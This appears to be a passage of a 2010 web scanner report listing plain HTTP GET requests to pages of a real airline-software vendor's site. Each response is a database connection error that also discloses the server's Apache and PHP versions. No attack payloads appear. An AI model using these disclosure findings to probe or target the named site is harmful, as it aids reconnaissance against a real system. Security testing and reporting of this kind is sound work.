GET /home/products_services/airline_reservations/sabresonic_loyalty/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322291; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_res HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_check-in%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_res/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322262; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_technology HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_technology/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_ticket HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_ticket/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_ticket/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322302; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_user_experience HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_user_experience/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_user_experience/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322305; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/marketing_planning Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:28:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/marketing_planning/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:28:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323085; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:36:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322933; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A1%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:30:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/airvision_technology HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323118; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fenterprise_operations%2Fmanage_change%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fairline_reservations%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:41:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/airvision_technology/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322958; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Ftechnology%2Fsoftware_as_a_service%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fproduct%2Fsabre_revenue_integrity%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_in-flight%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:33:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/build_brand HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323109; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:40:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/build_brand/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322950; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:33:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/build_profit HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323072; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:38:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/build_profit/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322940; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:32:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/downloads HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323081; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:37:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/downloads/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322946; __utmb=178985382.2.10.1286295079; 